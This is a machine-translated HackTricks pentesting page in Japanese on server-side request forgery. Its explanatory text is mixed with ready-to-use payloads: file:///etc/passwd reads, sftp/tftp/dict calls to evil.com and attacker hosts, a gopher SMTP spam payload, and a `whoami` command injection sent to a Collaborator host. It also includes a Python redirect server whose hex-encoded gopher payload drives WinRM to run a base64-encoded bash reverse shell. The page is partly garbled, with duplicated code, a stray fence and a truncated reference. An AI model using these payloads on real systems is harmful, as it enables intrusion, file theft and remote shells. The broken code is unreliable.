hacktricks/pentesting-web/ssrf-server-side-request-forgery

SSRF（サーバーサイドリクエストフォージェリ）

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化します。
今すぐアクセスを取得：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、最新バージョンのPEASSを入手したいですか、またはHackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
• The PEASS Familyを発見しましょう、私たちの独占的なNFTのコレクション
• 公式のPEASS＆HackTricks swagを手に入れましょう
• 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm.
• ハッキングのトリックを共有するには、hacktricks repo および hacktricks-cloud repo にPRを提出してください。

サーバーサイドリクエストフォージェリ（SSRF）は、攻撃者が選択した攻撃者のドメインに対してサーバーサイドアプリケーションにHTTPリクエストを行わせることができるウェブセキュリティの脆弱性です（ここから）。

SSRFのキャプチャ

最初に行う必要があるのは、自分が引き起こしたSSRFの相互作用をキャプチャすることです。HTTPまたはDNSの相互作用をキャプチャするには、次のようなツールを使用できます。

• Burpcollab
• pingb
• canarytokens
• interractsh
• http://webhook.site
• https://github.com/teknogeek/ssrf-sheriff

ホワイトリストされたドメインのバイパス

通常、SSRFは特定のホワイトリストされたドメインまたはURLでのみ機能することがわかります。次のページでは、そのホワイトリストをバイパスするためのテクニックのコンパイルがあります：

{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

オープンリダイレクトを介したバイパス

サーバーが正しく保護されている場合、ウェブページ内のオープンリダイレクトを悪用することで、すべての制限をバイパスすることができます。ウェブページは同じドメインへのSSRFを許可し、おそらくリダイレクトをたどるでしょうので、オープンリダイレクトを悪用してサーバーが内部のリソースにアクセスすることができます。
詳細はこちら：https://portswigger.net/web-security/ssrf

プロトコル

file://

file:///etc/passwd

dict://

DICT URLスキームは、DICTプロトコルを使用して利用可能な定義や単語リストを参照するために使用されます。

dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/

SFTP://

セキュアシェル上での安全なファイル転送に使用されるネットワークプロトコルです。

ssrf.php?url=sftp://evil.com:11111/

TFTP://

Trivial File Transfer Protocol（TFTP）は、UDP上で動作します。

ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

LDAP://

Lightweight Directory Access Protocol（軽量ディレクトリアクセスプロトコル）。IPネットワーク上で使用されるアプリケーションプロトコルで、分散ディレクトリ情報サービスの管理とアクセスに使用されます。

ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

Gopher://

このプロトコルを使用すると、IP、ポート、バイトを指定してサーバーに送信することができます。その後、基本的にはSSRFを利用して任意のTCPサーバーと通信することができます（ただし、まずサービスとの通信方法を知る必要があります）。 幸いなことに、Gopherusを使用して、複数のサービスに対してペイロードを作成することができます。さらに、remote-method-guesserを使用して、Java RMI サービス向けの_gopher_ ペイロードを作成することもできます。

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

Gopher HTTP is a technique used in server-side request forgery (SSRF) attacks. SSRF is a vulnerability that allows an attacker to make requests from the targeted server to other internal or external resources. Gopher HTTP takes advantage of the Gopher protocol, which is a simple protocol used for retrieving documents over the Internet.

In a Gopher HTTP attack, the attacker crafts a malicious request that tricks the server into making a request to a specified URL using the Gopher protocol. This can be used to bypass security measures that may be in place to prevent direct access to certain resources.

To perform a Gopher HTTP attack, the attacker typically needs to find a vulnerable parameter that accepts URLs and is susceptible to SSRF. The attacker then crafts a URL using the Gopher protocol and includes the desired target URL as a parameter. When the server processes the request, it will make a request to the specified URL using the Gopher protocol, potentially leaking sensitive information or performing unauthorized actions.

It is important for developers to be aware of the risks associated with SSRF vulnerabilities and implement proper input validation and sanitization to prevent these types of attacks. Additionally, server administrators should consider blocking or restricting access to the Gopher protocol if it is not necessary for their applications.

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — 1337にバックコネクトする

{% code title="redirect.php" %}

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

{% endcode %}

SMTP

https://twitter.com/har1sec/status/1182255952055164929から：
1. SSRFでlocalhostのSMTPポート（25番）に接続する
2. 最初の行から内部ドメイン名を取得する 220 http://blabla.internaldomain.com ESMTP Sendmail
3. http://internaldomain.comをGitHubで検索し、サブドメインを見つける
4. 接続する

Curl URL globbing - WAF bypass

もしSSRFがcurlによって実行される場合、curlにはURL globbingという機能があり、WAFをバイパスするのに役立つかもしれません。例えば、このwriteupでは、fileプロトコルを介したパストラバーサルの例があります。

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

SSRFリクエストのキャプチャ

• Burp Collaborator
• http://requestrepo.com/
• https://app.interactsh.com/
• https://github.com/stolenusername/cowitness

リファラーヘッダーを使用したSSRF

一部のアプリケーションでは、訪問者を追跡するためのサーバーサイドの分析ソフトウェアが使用されています。このソフトウェアは、リファラーヘッダーをリクエストに記録することがあります。これは、受信リンクの分析に特に興味があるためです。通常、分析ソフトウェアは、リファラーヘッダーに表示されるサードパーティのURLを実際に訪問します。これは、受信リンクで使用されるアンカーテキストを含む参照サイトの内容を分析するために行われます。その結果、リファラーヘッダーはしばしばSSRFの脆弱性の攻撃対象となります。
このような「隠れた」脆弱性を発見するために、Burpのプラグイン「Collaborator Everywhere」を使用することができます。

証明書からのSNIデータを使用したSSRF

任意のバックエンドに接続するための最も単純な設定ミスは、次のようになります：

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

ここでは、SNIフィールドの値がバックエンドのアドレスとして直接使用されています。

この安全でない設定では、SSRF脆弱性を簡単に悪用することができます。SNIフィールドに希望するIPアドレスまたはドメイン名を指定するだけで、Nginxを_internal.host.com_に接続させることができます。例えば、以下のコマンドを使用します。

openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlf

Wgetファイルのアップロード

コマンドインジェクションを伴うSSRF

次のようなペイロードを試してみる価値があります: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDFのレンダリング

ウェブページが提供した情報で自動的にPDFを作成している場合、PDF作成時にサーバー自体で実行されるJSを挿入することができます。これにより、SSRFを悪用することができます。ここで詳細情報を見つけることができます.

SSRFからDoSへ

複数のセッションを作成し、セッションからSSRFを悪用して重いファイルをダウンロードしようとしてください。

SSRF PHP関数

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

GopherへのSSRFリダイレクト

一部の攻撃では、リダイレクトレスポンスを送信する必要がある場合があります（おそらくgopherのような異なるプロトコルを使用するため）。以下に、リダイレクトを返すための異なるPythonコードがあります:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)

self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
```python
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化します。
今すぐアクセスを取得：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

DNS Rebidding CORS/SOPバイパス

CORS/SOPの制限をバイパスするために、ローカルIPからコンテンツを外部に流出させることに問題がある場合、DNS Rebiddingを使用できます。

{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}

自動化されたDNS Rebidding

Singularity of Originは、DNS rebinding攻撃を実行するためのツールです。このツールには、攻撃サーバーのDNS名のIPアドレスをターゲットマシンのIPアドレスに再バインドし、ターゲットマシン上の脆弱なソフトウェアを悪用するための攻撃ペイロードを提供するために必要なコンポーネントが含まれています。

また、http://rebind.it/singularity.htmlで公開されているサーバーもチェックしてください。

DNS Rebidding + TLSセッションID/セッションチケット

要件：

• SSRF
• アウトバウンドTLSセッション
• ローカルポート上のもの

攻撃手順：

1. ユーザー/ボットに攻撃者が制御するドメインにアクセスさせます。
2. DNSのTTLは0秒です（したがって、被害者はドメインのIPをすぐに再度チェックします）。
3. 被害者と攻撃者のドメイン間でTLS接続が作成されます。攻撃者はセッションIDまたはセッションチケット内にペイロードを挿入します。
4. ドメインは自身に対して無限ループのリダイレクトを開始します。これの目的は、ユーザー/ボットがドメインにアクセスし続け、ドメインのDNSリクエストを再度実行することです。
5. DNSリクエストでプライベートIPアドレスが現在指定されます（例：127.0.0.1）。
6. ユーザー/ボットはTLS接続を再確立しようとし、そのためにセッションID/チケットIDを送信します（攻撃者のペイロードが含まれていた場所）。おめでとうございます、ユーザー/ボットが自身を攻撃するように要求することに成功しました。

この攻撃中、localhost:11211（memcache）を攻撃する場合、被害者に最初の接続をwww.attacker.com:11211（ポートは常に同じである必要があります）で確立させる必要があります。
この攻撃を実行するためには、次のツールを使用できます：https://github.com/jmdx/TLS-poison/
この攻撃についての詳細は、次のトークを参照してください：https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Blind SSRF

盲目のSSRFと非盲目のSSRFの違いは、盲目の場合にSSRFリクエストの応答を見ることができないことです。そのため、既知の脆弱性のみを悪用することができるため、悪用はより困難です。

時間ベースのSSRF

サーバーからの応答の時間をチェックすることで、リソースが存在するかどうかを判断することができるかもしれません（存在するリソースにアクセスするのに時間がかかる場合、存在しないリソースにアクセスするよりも時間がかかるかもしれません）。

Cloud SSRF Exploitation

クラウド環境内で実行されているマシンでSSRFの脆弱性を見つけた場合、クラウド環境に関する興味深い情報や資格情報を入手することができるかもしれません。

{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}

SSRFの脆弱なプラットフォーム

いくつかの既知のプラットフォームには、SSRFの脆弱性が含まれているか、含まれていたことがあります。詳細は次を参照してください：

{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}

ツール

SSRFMap

SSRFの脆弱性を検出および悪用するためのツール

Gopherus

• Gopherusに関するブログ記事

このツールは、次のためのGopherペイロードを生成します：

• MySQL
• PostgreSQL
• FastCGI
• Redis
• Zabbix
• Memcache

remote-method-guesser

• SSRFの使用に関するブログ記事

_remote-method-guesser_は、一般的なJava RMIの脆弱性に対して攻撃操作をサポートするJava RMIの脆弱性スキャナです。ほとんどの操作は、要求された操作に対してSSRFペイロードを生成するための--ssrfオプションをサポートしています。--gopherオプションと一緒に使用すると、直接使用できるgopherペイロードが生成されます。

SSRF Proxy

SSRFに対して脆弱なサーバーを介してクライアントのHTTPトラフィックをトンネルするために設計されたマルチスレッドのHTTPプロキシサーバー。

練習するために

{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}

参考文献

• https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
• [https://www.invicti.com/blog/web-security/ssrf-vulner
• 公式のPEASS＆HackTricksグッズを手に入れる
• 💬 Discordグループに参加するか、テレグラムグループに参加するか、Twitterで私をフォローする 🐦@carlospolopm.
• 自分のハッキングテクニックを共有するために、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出する。

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築して自動化します。
今すぐアクセスを取得：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}